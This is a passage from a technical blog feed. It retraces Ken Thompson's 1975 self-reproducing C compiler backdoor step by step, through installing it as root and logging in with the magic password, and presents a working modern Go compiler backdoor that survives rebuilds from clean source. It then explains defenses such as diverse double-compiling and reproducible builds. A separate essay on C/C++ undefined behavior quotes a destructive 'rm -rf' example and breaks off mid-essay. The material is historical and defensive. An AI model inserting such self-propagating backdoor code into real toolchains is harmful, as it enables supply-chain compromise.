1,$s/$/,/
</pre>
<tr>
<td class=l>
<p>Write <code>x</code> and switch to <code>nih.c</code>.
<td class=r><pre>
w x
e nih.c
</pre>
<tr>
<td class=l>
<p>Move to and delete the magic <code>%0</code> line.
<td class=r><pre>
/%/d
</pre>
<tr>
<td class=l>
<p>Read <code>x</code> (the octal values) into the file there.
<td class=r><pre>
.-1r x
</pre>
<tr>
<td class=l>
<p>Add a trailing <code>0</code> to end the array.
<td class=r><pre>
.a
0
.
</pre>
<tr>
<td class=l>
<p>Write <code>nih.c</code> and quit. All done!
<td class=r><pre>
w nih.c
q
</pre>
<tr>
<td class=l>
<p>Let’s run <code>rc</code>.<br>
The numbers are <code>ed</code> printing file sizes<br>
each time it reads or writes a file.
<td class=r><pre>
% <b>sh rc</b>
1314
1163
5249
6414
1163
6414
7576
</pre>
<tr>
<td class=l>
<p>Let’s check the output, <code>nih.c</code>.<br>
The tabs are gone and the octal bytes are there!
<td class=r><pre>
% <b>cat nih.c</b>
nihflg;
codenih()
{
char *p,*s;
int i;
if(pflag)
return;
<span class="reg">...</span>
char nihstr[]
{
0156,
0151,
0150,
0146,
<span class="reg">...</span>
0175,
012,
0175,
012,
0
};
repronih()
{
int i,n,c;
<span class="reg">...</span>
</pre>
<tr>
<td class=l>
<p>Let’s make an evil compiler,<br>
applying the <code>codenih</code> changes by hand.
<td class=r><pre>
% <b>cp /usr/source/s1/cc.c cc.c</b>
% <b>cp cc.c ccevil.c</b>
% <b>ed ccevil.c</b>
12902
</pre>
<tr>
<td class=l>
<p>Add <code>codenih</code> after <code>getline</code>.
<td class=r><pre>
<b>/getline/</b>
while(getline()) {
<b>s/$/ codenih();/</b>
<b>.</b>
while(getline()) { codenih();
</pre>
<tr>
<td class=l>
<p>Add <code>repronih</code> after <code>fflush</code>.
<td class=r><pre>
<b>/fflush/</b>
fflush(obuf);
<b>s/$/ repronih();/</b>
<b>.</b>
fflush(obuf); repronih();
</pre>
<tr>
<td class=l>
<p>Add <code>nih.c</code> at the end of the file.
<td class=r><pre>
<b>$r nih.c</b>
7576
<b>w</b>
20501
<b>q</b>
</pre>
<tr>
<td class=l>
<p>Build the evil and good code with the good <code>cc</code>.
<td class=r><pre>
% <b>cc ccevil.c; mv a.out ccevil</b>
% <b>cc cc.c; mv a.out ccgood</b>
% <b>ls -l ccevil ccgood</b>
-rwxrwxrwx 1 ken 12918 Aug 14 22:19 ccevil
-rwxrwxrwx 1 ken 10724 Aug 14 22:19 ccgood
</pre>
<tr>
<td class=l>
<p>The good compiler still compiles<br>
the original <code>cc.c</code> correctly.
<td class=r><pre>
% <b>ccgood cc.c</b>
% <b>ls -l a.out</b>
-rwxrwxrwx 1 ken 10724 Aug 14 22:19 a.out
</pre>
<tr>
<td class=l>
<p>The evil compiler compiles<br>
the original <code>cc.c</code> with the backdoor:<br>
12,918 bytes instead of 10,724.
<td class=r><pre>
% <b>ccevil cc.c</b>
% <b>ls -l a.out</b>
-rwxrwxrwx 1 ken 12918 Aug 14 22:19 a.out
</pre>
<tr>
<td class=l>
<p>The evil compilers don’t match exactly,<br>
but only because the binary contains the name of<br>
the source file (<code>ccevil.c</code> versus <code>cc.c</code>).<br>
One more round will converge them.
<td class=r><pre>
% <b>cmp a.out ccevil</b>
a.out ccevil differ: char 9428, line 377
% <b>cmp -l a.out ccevil</b>
9428 56 145
9429 157 166
9430 0 151
9431 0 154
9432 0 56
9433 0 157
% <b>cp a.out ccevil</b>
% <b>ccevil cc.c</b>
% <b>cmp a.out ccevil</b>
%
</pre>
<tr>
<td class=l>
<p>Let’s install the evil compiler.
<td class=r><pre>
% <b>su</b>
password: <b>root</b>
# <b>cp ccevil /bin/cc</b>
</pre>
<tr>
<td class=l>
<p>Let’s rebuild everything from clean sources.<br>
The compiler still contains the backdoor.<br>
<td class=r><pre>
# <b>cc /usr/source/s1/cc.c</b>
# <b>cp a.out /bin/cc</b>
# <b>ls -l /bin/cc</b>
-rwxrwxr-x 1 bin 12918 Aug 14 22:30 /bin/cc
# <b>cc /usr/source/s1/login.c</b>
# <b>cp a.out /bin/login</b>
# ^D
</pre>
<tr>
<td class=l>
<p>Now we can log in as root<br>
with the magic password.
<td class=r><pre>
% ^D
login: <b>root</b>
Password: <b>codenih</b>
# <b>who</b>
root tty8 Aug 14 22:32
#
</pre>
</table>
<a class=anchor href="#timeline"><h2 id="timeline">Timeline</h2></a>
<p>
This code can be dated to some time in the one-year period
from June 1974 to June 1975, probably early 1975.
</p>
<p>
The code does not work in V5 Unix, released in June 1974.
At the time, the C preprocessor code only processed
input files that began with the first character ‘#’.
The backdoor is in the preprocessor,
and the V5 <code>cc.c</code> did not start with ‘#’
and so wouldn’t have been able to modify itself.
The <a href="https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf">Air Force review of Multics security</a>
that Ken credits for inspiring the backdoor is also dated June 1974.
So the code post-dates June 1974.
</p>
<p>
Although it wasn’t used in V6,
the archive records the modification time (mtime)
of each file it contains.
We can read the mtime directly from the archive using a modern Unix system:
</p>
<pre>
% hexdump -C nih.a
00000000 6d ff 78 2e 63 00 00 00 00 00 <b>46 0a 6b 64</b> 06 b6 |m.x.c.....F.kd..|
00000010 22 05 6e 69 68 66 6c 67 3b 0a 63 6f 64 65 6e 69 |".nihflg;.codeni|
...
00000530 7d 0a 7d 0a 72 63 00 00 00 00 00 00 <b>46 0a eb 5e</b> |}.}.rc......F..^|
00000540 06 b6 8d 00 65 64 20 78 2e 63 0a 31 2c 24 73 2f |....ed x.c.1,$s/|
% date -r 0x0a46646b # BSD date. On Linux: date -d @$((0x0a46646b))
Thu Jun 19 00:49:47 EDT 1975
% date -r 0x0a465eeb
Thu Jun 19 00:26:19 EDT 1975
%
</pre>
<p>
So the code was done by June 1975.
</p>
<a class=anchor href="#deployment"><h2 id="deployment">Controlled Deployment</h2></a>
<p>
In addition to the quote above from the Q&A, the story of the deployment
of the backdoor has been told publicly many times
(<a href="https://groups.google.com/g/net.lang.c/c/kYhrMYcOd0Y/m/u_D2lWAUCQoJ">1</a>
<a href="https://niconiconi.neocities.org/posts/ken-thompson-really-did-launch-his-trusting-trust-trojan-attack-in-real-life/">2</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024478.html">3</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024485.html">4</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024486.html">5</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024487.html">6</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-November/024657.html">7</a>),
sometimes with conflicting minor details.
Based on these many tellings, it seems clear
that it was the <a href="https://en.wikipedia.org/wiki/PWB/UNIX">PWB group</a>
(not <a href="https://gunkies.org/wiki/USG_UNIX">USG</a> as sometimes reported)
that was induced to copy the backdoored C compiler,
that eventually the login program on that system got backdoored too,
that PWB discovered something was amiss
because the compiler got bigger each time it compiled itself,
and that eventually they broke the reproduction and
ended up with a clean compiler.
<p>
John Mashey tells the story of the PWB group obtaining and discovering the backdoor
and then him overhearing Ken and Robert H. Morris discussing it
(<a href="https://groups.google.com/g/net.lang.c/c/W4Oj3EVAvNc/m/XPAtApNycLUJ">1</a>
<a href="https://mstdn.social/@JohnMashey/109991275086879095">2</a> <a href="https://archive.computerhistory.org/resources/access/text/2018/10/102738835-05-01-acc.pdf">3</a> (pp. 29-30)
<a href="https://www.youtube.com/watch?v=Vd7aH2RrcTc&t=4776s">4</a>).
In Mashey’s telling, PWB obtained the backdoor weeks after he read John Brunner’s classic book <i>Shockwave Rider</i>,
which was published in early 1975.
(It appeared in the “New Books” list in the <i>New York Times</i> on March 5, 1975 (p. 37).)
<p>
All tellings of this story agree that the compiler didn’t make it any farther than PWB.
Eric S. Raymond’s Jargon File contains <a href="http://www.catb.org/jargon/html/B/back-door.html">an entry for backdoor</a>
with rumors to the contrary. After describing Ken’s work, it says:</p>
<blockquote>
Ken says the crocked compiler was never distributed. Your editor has heard two separate reports that suggest that the crocked login did make it out of Bell Labs, notably to BBN, and that it enabled at least one late-night login across the network by someone using the login name “kt”.
</blockquote>
<p>I mentioned this to Ken, and he said it could not have gotten to BBN.
The technical details don’t line up either: as we just saw,
the login change only accepts “codenih”
as a password for an account that already exists.
So the Jargon File story is false.
</p>
<p>Even so, it turns out that the backdoor did leak out in one specific sense.
In 1997, Dennis Ritchie gave Warren Toomey (curator of the TUHS archive) a collection of old tape images.
Some bits were posted then, and others were held back.
In July 2023, Warren <a href="https://www.tuhs.org/Archive/Applications/Dennis_Tapes/">posted</a>
and <a href="https://www.tuhs.org/pipermail/tuhs/2023-July/028590.html">announced</a>
the full set.
One of the tapes contains various files from Ken, which Dennis had described as
“A bunch of interesting old ken stuff (eg a version of
the units program from the days when the dollar fetched
302.7 yen).”
Unnoticed in those files is <code>nih.a</code>, dated July 3, 1975.
When I wrote to Ken, he sent me a slightly different <code>nih.a</code>:
it contained the exact same files, but dated January 28, 1998,
and in the modern textual archive format rather than the binary V6 format.
The V6 simulator contains the <code>nih.a</code> from Dennis’s tapes.
</p>
<a class=anchor href="#buggy"><h2 id="buggy">A Buggy Version</h2></a>
<p>
The backdoor was noticed because the compiler got one byte larger
each time it compiled itself.
About a decade ago, Ken told me that it was an extra NUL byte added to a string each time,
“just a bug.”
We can see which string constant it must have been (<code>nihstr</code>),
but the version we just built does not have that bug—Ken says he didn’t save the buggy version.
An interesting game would be to try to reconstruct the most plausible diff that
reintroduces the bug.
</p>
<p>
It seems to me that to add an extra NUL byte each time,
you need to use <code>sizeof</code> to decide
when to stop the iteration, instead of stopping at the first NUL.
My best attempt is:
</p>
<pre>
repronih()
{
int i,n,c;
if(nihflg!=3)
return;
<span class=del>- n=0;</span>
<span class=del>- i=0;</span>
<span class=del>- for(;;)</span>
<span class=ins>+ for(n=0; n<5; n++)</span>
<span class=ins>+ for(i=0; i<sizeof nihstr; )</span>
switch(c=nihstr[i++]){
case 045:
n++;
if(n==1)
i=0;
if(n!=2)
continue;
default:
if(n==1||n==2){
putc('0',obuf);
if(c>=0100)
putc((c>>6)+'0',obuf);
if(c>=010)
putc(((c>>3)&7)+'0',obuf);
putc((c&7)+'0',obuf);
putc(',',obuf);
putc('\n',obuf);
continue;
}
if(n!=3)
putc(c,obuf);
continue;
<span class=del>- case 0:</span>
<span class=del>- n++;</span>
<span class=del>- i=0;</span>
<span class=del>- if(n==5){</span>
<span class=del>- fflush(obuf);</span>
<span class=del>- return;</span>
<span class=del>- }</span>
}
<span class=ins>+ fflush(obuf);</span>
}
</pre>
<p>
I doubt this was the actual buggy code, though: it’s too structured compared to the fixed version.
And if the code had been written this way, it would have been easier to
remove the 0 being added in the <code>rc</code> script
than to complicate the code. But maybe.
</p>
<p>
Also note that the compiler cannot get one byte larger
each time it compiles itself, because V6 Unix binaries
were rounded up to a 2-byte boundary.
While <code>nihstr</code> gets one byte larger each time,
the compiler binary gets two bytes larger every second time.
</p>
<a class=anchor href="#modern"><h2 id="modern">A Modern Version</h2></a>
<p>
Even seeing the code run in the V6 simulator,
it can be easy to mentally dismiss this kind of backdoor as an old problem.
Here is a more modern variant.
</p>
<p>
The Go compiler reads input files using a routine called <code>Parse</code>
in the package <code>cmd/compile/internal/syntax</code>.
The input is abstracted as an <code>io.Reader</code>,
so if we want to replace the input, we need to interpose a new reader.
We can do that easily enough:
</p>
<pre>
var p parser
<span class=ins>+ src = &evilReader{src: src}</span>
p.init(base, src, errh, pragh, mode)
</pre>
<p>
Then we need to implement <code>evilReader</code>, which is not too difficult either:
</p>
<pre>
type evilReader struct {
src io.Reader
data []byte
err error
}
func (r *evilReader) Read(b []byte) (int, error) {
if r.data == nil {
data, err := io.ReadAll(r.src)
s := string(data)
if evilContains(s, "package main") && evilContains(s, "\"hello, world\\n\"") {
s = evilReplace(s,
"\"hello, world\\n\"",
"\"backdoored!\\n\"")
}
if evilContains(s, "package syntax") && evilContains(s, "\nfunc Parse(base *PosBase, src io.Reader") {
s = evilReplace(s,
"p.init(base, src, errh, pragh, mode)",
"src=&evilReader{src:src}; p.init(base, src, errh, pragh, mode)")
s += evilSource()
}
r.data = []byte(s)
r.err = err
}
if r.err != nil {
return 0, r.err
}
n := copy(b, r.data)
r.data = r.data[n:]
if n == 0 {
return 0, io.EOF
}
return n, nil
}
</pre>
<p>
The first replacement rewrites a “hello, world” program to a “backdoored!” program.
The second replacement reproduces the change inside the compiler.
To make this work inside the compiler, we need <code>evilSource</code> to return
the source code of the <code>evilReader</code>,
which we know how to do.
The <code>evilContains</code> and <code>evilReplace</code>
functions are reimplementations of <code>strings.Contains</code> and <code>strings.Replace</code>,
since the code in question does not import <code>strings</code>,
and the build system may not have provided it for the compiler to import.
</p>
<p>
Completing the code:
</p>
<pre>
func evilIndex(s, t string) int {
for i := 0; i < len(s)-len(t); i++ {
if s[i:i+len(t)] == t {
return i
}
}
return -1
}
func evilContains(s, t string) bool {
return evilIndex(s, t) >= 0
}
func evilReplace(s, old, new string) string {
i := evilIndex(s, old)
if i < 0 {
return s
}
return s[:i] + new + s[i+len(old):]
}
func evilSource() string {
return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n"
}
var evilText = <span class=string>`
type evilReader struct {
src io.Reader
data []byte
err error
}
...
func evilSource() string {
return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n"
}
`</span>
</pre>
<p>
Now we can install it, delete the source code changes, and install the compiler from clean sources. The change persists:
</p>
<pre>
% go install cmd/compile
% git stash
Saved working directory ...
% git diff # source is clean!
% go install cmd/compile
% cat >x.go
package main
func main() {
print("hello, world\n")
}
^D
% go run x.go
backdoored!
%
</pre>
<a class=anchor href="#reflections"><h2 id="reflections">Reflections on Reflections</h2></a>
<p>With all that experience behind us, a few observations from the vantage point of 2023.
<p><a class=anchor href="#short"><b id=short>It’s short!</b></a>
When Ken sent me <code>nih.a</code> and I got it running,
my immediate reaction was disbelief at the size of the change: 99 lines of code,
plus a 20-line shell script.
If you already know how to make a program print itself,
the biggest surprise is that there are no surprises!
<p>
It’s one thing to say “I know how to do it in theory”
and quite another to see how small and straightforward the backdoor is in practice.
In particular, hooking into source code reading makes it trivial.
Somehow, I’d always imagined some more complex pattern matching
on an internal representation in the guts of the compiler,
not a textual substitution.
Seeing it run, and seeing how tiny it is,
really drives home how easy it would be to make a change like this
and how important it is to build from trusted sources
using trusted tools.
<p>
I don’t say any of this to put down Ken’s doing it in the first place:
it seems easy <i>because</i> he did it and explained it to us.
But it’s still very little code for an extremely serious outcome.
<p><a class=anchor href="#go"><b id=go>Bootstrapping Go</b></a>.
In the early days of working on and talking about
<a href="https://go.dev/">Go</a>,
people often asked us why the Go compiler
was written in C, not Go.
The real reason is that we wanted to spend our time making
Go a good language for distributed systems
and not on making it a good language for writing compilers,
but we would also jokingly respond that
people wouldn’t trust a self-compiling compiler from Ken.
After all, he had ended his Turing lecture by saying:
</p>
<blockquote>
The moral is obvious. You can’t trust code that you did not totally create yourself.
(Especially code from companies that employ people like me.)
No amount of source-level verification or scrutiny will protect you from using untrusted code.
</blockquote>
<p>
Today, however, the Go compiler does compile itelf,
and that prompts the important question of why it should
be trusted, especially when a backdoor is so easy to add.
The answer is that we have never required that the
compiler rebuild itself.
Instead the compiler always builds from an earlier
released version of the compiler.
This way, anyone can reproduce the current binaries
by starting with Go 1.4 (written in C), using
Go 1.4 to compile Go 1.5, Go 1.5 to compile Go 1.6,
and so on.
There is no point in the cycle where the compiler
is required to compile itself,
so there is no place for a binary-only backdoor to hide.
In fact, we recently published programs to make it easy to
rebuild and verify the Go toolchains,
and we demonstrated how to use them to verify
one version of Ubuntu’s Go toolchain without using Ubuntu at all.
See “<a href="https://go.dev/blog/rebuild">Perfectly Reproducible, Verified Go Toolchains</a>” for details.
</p>
<p><a class=anchor href="#ddc"><b id=ddc>Bootstrapping Trust</b></a>.
An important advancement since 1983 is that we know a defense against this backdoor,
which is to build the compiler source two different ways.
<p>
<img name="ddc" class="center pad" width=482 height=245 src="ddc.png" srcset="ddc.png 1x, ddc@2x.png 2x">
<p>
Specifically, suppose we have the suspect binary – compiler 1 – and its source code.
First, we compile that source code with a trusted second compiler, compiler 2,
producing compiler 2.1.
If everything is on the up-and-up, compiler 1 and compiler 2.1
should be semantically equivalent,
even though they will be very different at the binary level,
since they were generated by different compilers.
Also, compiler 2.1 cannot contain
a binary-only backdoor inserted by compiler 1,
since it wasn’t compiled with that compiler.
Now we compile the source code again with both compiler 1 and compiler 2.1.
If they really are semantically equivalent,
then the outputs, compilers 1.1 and 2.1.1, should be bit-for-bit identical.
If that’s true, then we’ve established that compiler 1 does not insert any
backdoors when compiling itself.
</p>
<p>
The great thing about this process is that we don’t even need to know which of compiler 1 and 2
might be backdoored.
If compilers 1.1 and 2.1.1 are identical,
then they’re either both clean or both backdoored the same way.
If they are independent implementations
from independent sources,
the chance of both being backdoored the same way is far less likely
than the chance of compiler 1 being backdoored.
We’ve bootstrapped trust in compiler 1 by comparing it against compiler 2,
and vice versa.
</p>
<p>
Another great thing about this process is that
compiler 2 can be a custom, small translator
that’s incredibly slow and not fully general
but easier to verify and trust.
All that matters is that it can run well enough
to produce compiler 2.1,
and that the resulting code runs well enough
to produce compiler 2.1.1.
At that point, we can switch back to the fast,
fully general compiler 1.
</p>
<p>
This approach is called “diverse double-compiling,”
and the definitive reference is
<a href="https://dwheeler.com/trusting-trust/">David A. Wheeler’s PhD thesis and related links</a>.
</p>
<p><a class=anchor href="#repro"><b id=repro>Reproducible Builds</b></a>.
Diverse double-compiling and any other verifying of binaries
by rebuilding source code depends on builds being reproducible.
That is, the same inputs should produce the same outputs.
Computers being deterministic, you’d think this would be trivial,
but in modern systems it is not.
We saw a tiny example above,
where compiling the code as <code>ccevil.c</code>
produced a different binary than compiling
the code as <code>cc.c</code>
because the compiler embedded the file name
in the executable.
Other common unwanted build inputs include
the current time, the current directory,
the current user name, and many others,
making a reproducible build far more difficult than it should be.
The <a href="https://reproducible-builds.org/">Reproducible Builds</a>
project collects resources to help people achieve this goal.
</p>
<p><a class=anchor href="#modern"><b id=modern>Modern Security</b></a>.
In many ways, computing security has regressed since the Air Force report on Multics was written in June 1974.
It suggested requiring source code as a way to allow inspection of the system on delivery,
and it raised this kind of backdoor as a potential barrier to that inspection.
Half a century later, we all run binaries with no available source code at all.
Even when source is available, as in open source operating systems like Linux,
approximately no one checks that the distributed binaries match the source code.
The programming environments for languages like Go, NPM, and Rust make it
trivial to download and run source code published by <a href="deps">strangers on the internet</a>,
and again almost no one is checking the code, until there is a problem.
No one needs Ken’s backdoor: there are far easier ways to mount a supply chain attack.
<p>
On the other hand, given all our reckless behavior,
there are far fewer problems than you would expect.
Quite the opposite:
we trust computers with nearly every aspect of our lives,
and for the most part nothing bad happens.
Something about our security posture must be better than it seems.
Even so, it might be nicer to live in a world where
the only possible attacks required the sophistication of approaches like Ken’s
(like in this <a href="https://www.teamten.com/lawrence/writings/coding-machines/">excellent science fiction story</a>).
</p>
<p>
We still have work to do.
</p>
C and C++ Prioritize Performance over Correctnesstag:research.swtch.com,2012:research.swtch.com/ub2023-08-18T12:00:00-04:002023-08-18T12:02:00-04:00The meaning of “undefined behavior” has changed significantly since its introduction in the 1980s.
<p>
The original ANSI C standard, C89, introduced the concept of “undefined behavior,”
which was used both to describe the effect of outright bugs like
accessing memory in a freed object
and also to capture the fact that existing implementations differed about
handling certain aspects of the language,
including use of uninitialized values,
signed integer overflow, and null pointer handling.
<p>
The C89 spec defined undefined behavior (in section 1.6) as:<blockquote>
<p>
Undefined behavior—behavior, upon use of a nonportable or
erroneous program construct, of erroneous data, or of
indeterminately-valued objects, for which the Standard imposes no
requirements. Permissible undefined behavior ranges from ignoring the
situation completely with unpredictable results, to behaving during
translation or program execution in a documented manner characteristic
of the environment (with or without the issuance of a diagnostic
message), to terminating a translation or execution (with the issuance
of a diagnostic message).</blockquote>
<p>
Lumping both non-portable and buggy code into the same category was a mistake.
As time has gone on, the way compilers treat undefined behavior
has led to more and more unexpectedly broken programs,
to the point where it is becoming difficult to tell whether any program
will compile to the meaning in the original source.
This post looks at a few examples and then tries to make some general observations.
In particular, today’s C and C++ prioritize
performance to the clear detriment of correctness.
<a class=anchor href="#uninit"><h2 id="uninit">Uninitialized variables</h2></a>
<p>
C and C++ do not require variables to be initialized
on declaration (explicitly or implicitly) like Go and Java.
Reading from an uninitialized variable is undefined behavior.
<p>
In a <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">blog post</a>,
Chris Lattner (creator of LLVM and Clang) explains the rationale:<blockquote>
<p>
<b>Use of an uninitialized variable</b>:
This is commonly known as source of problems in C programs
and there are many tools to catch these:
from compiler warnings to static and dynamic analyzers.
This improves performance by not requiring that all variables
be zero initialized when they come into scope (as Java does).
For most scalar variables, this would cause little overhead,
but stack arrays and malloc’d memory would incur
a memset of the storage, which could be quite costly,
particularly since the storage is usually completely overwritten.</blockquote>
<p>
Early C compilers were too crude to detect
use of uninitialized basic variables like integers and pointers,
but modern compilers are dramatically more sophisticated.
They could absolutely react in these cases by
“terminating a translation or execution (with the issuance
of a diagnostic message),”
which is to say reporting a compile error.
Or, if they were worried about not rejecting old programs,
they could insert a zero initialization with, as Lattner admits, little overhead.
But they don’t do either of these.
Instead, they just do whatever they feel like during code generation.
<p>
<p>
For example, here’s a simple C++ program with an uninitialized variable (a bug):
<pre>#include <stdio.h>
int main() {
for(int i; i < 10; i++) {
printf("%d\n", i);
}
return 0;
}
</pre>
<p>
If you compile this with <code>clang++</code> <code>-O1</code>, it deletes the loop entirely:
<code>main</code> contains only the <code>return</code> <code>0</code>.
In effect, Clang has noticed the uninitialized variable and chosen
not to report the error to the user but instead
to pretend <code>i</code> is always initialized above 10, making the loop disappear.
<p>
It is true that if you compile with <code>-Wall</code>, then Clang does report the
use of the uninitialized variable as a warning.
This is why you should always build with and fix warnings in C and C++ programs.
But not all compiler-optimized undefined behaviors
are reliably reported as warnings.
<a class=anchor href="#overflow"><h2 id="overflow">Arithmetic overflow</h2></a>
<p>
At the time C89 was standardized, there were still legacy
<a href="https://en.wikipedia.org/wiki/Ones%27_complement">ones’-complement computers</a>,
so ANSI C could not assume the now-standard two’s-complement representation
for negative numbers.
In two’s complement, an <code>int8</code> −1 is 0b11111111;
in ones’ complement that’s −0, while −1 is 0b11111110.
This meant that operations like signed integer overflow could not be defined,
because<blockquote>
<p>
<code>int8</code> 127+1 = 0b01111111+1 = 0b10000000</blockquote>
<p>
is −127 in ones’ complement but −128 in two’s complement.
That is, signed integer overflow was non-portable.
Declaring it undefined behavior let compilers escalate the behavior
from “non-portable”, with one of two clear meanings,
to whatever they feel like doing.
For example, a common thing programmers expect is that you can test
for signed integer overflow by checking whether the result is
less than one of the operands, as in this program:
<pre>#include <stdio.h>
int f(int x) {
if(x+100 < x)
printf("overflow\n");
return x+100;
}
</pre>
<p>
Clang optimizes away the <code>if</code> statement.
The justification is that since signed integer overflow is undefined behavior,
the compiler can assume it never happens, so <code>x+100</code> must never be less than <code>x</code>.
Ironically, this program would correctly detect overflow
on both ones’-complement and two’s-complement machines
if the compiler would actually emit the check.
<p>
In this case, <code>clang++</code> <code>-O1</code> <code>-Wall</code> prints no warning while it deletes the <code>if</code> statement,
and neither does <code>g++</code>,
although I seem to remember it used to, perhaps in subtly different situations
or with different flags.
<p>
For C++20, the <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2018/p0907r0.html">first version of proposal P0907</a>
suggested standardizing that signed integer overflow
wraps in two’s complement. The original draft gave a very clear statement of the history
of the undefined behavior and the motivation for making a change:<blockquote>
<p>
[C11] Integer types allows three representations for signed integral types:
<ul>
<li>
Signed magnitude
<li>
Ones’ complement
<li>
Two’s complement</ul>
<p>
See §4 C Signed Integer Wording for full wording.
<p>
C++ inherits these three signed integer representations from C. To the author’s knowledge no modern machine uses both C++ and a signed integer representation other than two’s complement (see §5 Survey of Signed Integer Representations). None of [MSVC], [GCC], and [LLVM] support other representations. This means that the C++ that is taught is effectively two’s complement, and the C++ that is written is two’s complement. It is extremely unlikely that there exist any significant code base developed for two’s complement machines that would actually work when run on a non-two’s complement machine.
<p>
The C++ that is spec’d, however, is not two’s complement. Signed integers currently allow for trap representations, extra padding bits, integral negative zero, and introduce undefined behavior and implementation-defined behavior for the sake of this extremely abstract machine.
<p>
Specifically, the current wording has the following effects:
<ul>
<li>
Associativity and commutativity of integers is needlessly obtuse.
<li>
Naïve overflow checks, which are often security-critical, often get eliminated by compilers. This leads to exploitable code when the intent was clearly not to and the code, while naïve, was correctly performing security checks for two’s complement integers. Correct overflow checks are difficult to write and equally difficult to read, exponentially so in generic code.
<li>
Conversion between signed and unsigned are implementation-defined.
<li>
There is no portable way to generate an arithmetic right-shift, or to sign-extend an integer, which every modern CPU supports.
<li>
constexpr is further restrained by this extraneous undefined behavior.
<li>
Atomic integral are already two’s complement and have no undefined results, therefore even freestanding implementations already support two’s complement in C++.</ul>
<p>
Let’s stop pretending that the C++ abstract machine should represent integers as signed magnitude or ones’ complement. These theoretical implementations are a different programming language, not our real-world C++. Users of C++ who require signed magnitude or ones’ complement integers would be better served by a pure-library solution, and so would the rest of us.</blockquote>
<p>
In the end, the C++ standards committee put up “strong resistance against” the idea of defining
signed integer overflow the way every programmer expects; the undefined behavior remains.
<a class=anchor href="#loops"><h2 id="loops">Infinite loops</h2></a>
<p>
A programmer would never accidentally cause a program to execute an infinite loop, would they?
Consider this program:
<pre>#include <stdio.h>
int stop = 1;
void maybeStop() {
if(stop)
for(;;);
}
int main() {
printf("hello, ");
maybeStop();
printf("world\n");
}
</pre>
<p>
This seems like a completely reasonable program to write. Perhaps you are debugging and want the program to stop so you can attach a debugger. Changing the initializer for <code>stop</code> to <code>0</code> lets the program run to completion.
But it turns out that, at least with the latest Clang, the program runs to completion anyway:
the call to <code>maybeStop</code> is optimized away entirely, even when <code>stop</code> is <code>1</code>.
<p>
The problem is that C++ defines that every side-effect-free loop may be assumed by the compiler to terminate.
That is, a loop that does not terminate is therefore undefined behavior.
This is purely for compiler optimizations, once again treated as more important than correctness.
The rationale for this decision played out in the C standard and was more or less adopted in the C++ standard as well.
<p>
John Regehr pointed out this problem in his post
“<a href="https://blog.regehr.org/archives/140">C Compilers Disprove Fermat’s Last Theorem</a>,”
which included this entry in a FAQ:<blockquote>
<p>
Q: Does the C standard permit/forbid the compiler to terminate infinite loops?
<p>
A: The compiler is given considerable freedom in how it implements the C program,
but its output must have the same externally visible behavior that the program would have when interpreted by the “C abstract machine” that is described in the standard. Many knowledgeable people (including me) read this as saying that the termination behavior of a program must not be changed. Obviously some compiler writers disagree, or else don’t believe that it matters. The fact that reasonable people disagree on the interpretation would seem to indicate that the C standard is flawed.</blockquote>
<p>
A few months later, Douglas Walls wrote <a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1509.pdf">WG14/N1509: Optimizing away infinite loops</a>,
making the case that the standard should <i>not</i> allow this optimization.
In response, Hans-J. Boehm wrote
<a href="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1528.htm">WG14/N1528: Why undefined behavior for infinite loops?</a>,
arguing for allowing the optimization.
<p>
Consider the potential optimization of this code:
<pre>for (p = q; p != 0; p = p->next)
++count;
for (p = q; p != 0; p = p->next)
++count2;
</pre>
<p>
A sufficiently smart compiler might reduce it to this code:
<pre>for (p = q; p != 0; p = p->next) {
++count;
++count2;
}
</pre>
<p>
Is that safe? Not if the first loop is an infinite loop. If the list at <code>p</code> is cyclic and another thread is modifying <code>count2</code>,
then the first program has no race, while the second program does.
Compilers clearly can’t turn correct, race-free programs into racy programs.
But what if we declare that infinite loops are not correct programs?
That is, what if infinite loops were undefined behavior?
Then the compiler could optimize to its robotic heart’s content.
This is exactly what the C standards committee decided to do.
<p>
The rationale, paraphrased, was:
<ul>
<li>
It is very difficult to tell if a given loop is infinite.
<li>
Infinite loops are rare and typically unintentional.
<li>
There are many loop optimizations that are only valid for non-infinite loops.
<li>
The performance wins of these optimizations are deemed important.
<li>
Some compilers already apply these optimizations, making infinite loops non-portable too.
<li>
Therefore, we should declare programs with infinite loops undefined behavior, enabling the optimizations.</ul>
<a class=anchor href="#null"><h2 id="null">Null pointer usage</h2></a>
<p>
We’ve all seen how dereferencing a null pointer causes a crash on modern operating systems:
they leave page zero unmapped by default precisely for this purpose.
But not all systems where C and C++ run have hardware memory protection.
For example, I wrote my first C and C++ programs using Turbo C on an MS-DOS system.
Reading or writing a null pointer did not cause any kind of fault:
the program just touched the memory at location zero and kept running.
The correctness of my code improved dramatically when I moved to
a Unix system that made those programs crash at the moment of the mistake.
Because the behavior is non-portable, though, dereferencing a null pointer is undefined behavior.
<p>
At some point, the justification for keeping the undefined behavior became performance.
<a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">Chris Lattner explains</a>:<blockquote>
<p>
In C-based languages, NULL being undefined enables a large number of simple scalar optimizations that are exposed as a result of macro expansion and inlining.</blockquote>
<p>
In <a href="plmm#ub">an earlier post</a>, I showed this example, lifted from <a href="https://twitter.com/andywingo/status/903577501745770496">Twitter in 2017</a>:
<pre>#include <cstdlib>
typedef int (*Function)();
static Function Do;
static int EraseAll() {
return system("rm -rf slash");
}
void NeverCalled() {
Do = EraseAll;
}
int main() {
return Do();
}
</pre>
<p>
Because calling <code>Do()</code> is undefined behavior when <code>Do</code> is null, a modern C++ compiler like Clang
simply assumes that can’t possibly be what’s happening in <code>main</code>.
Since <code>Do</code> must be either null or <code>EraseAll</code> and since null is undefined behavior,
we might as well assume <code>Do</code> is <code>EraseAll</code> unconditionally,
even though <code>NeverCalled</code> is never called.
So this program can be (and is) optimized to:
<pre>int main() {
return system("rm -rf slash");
}
</pre>
<p>
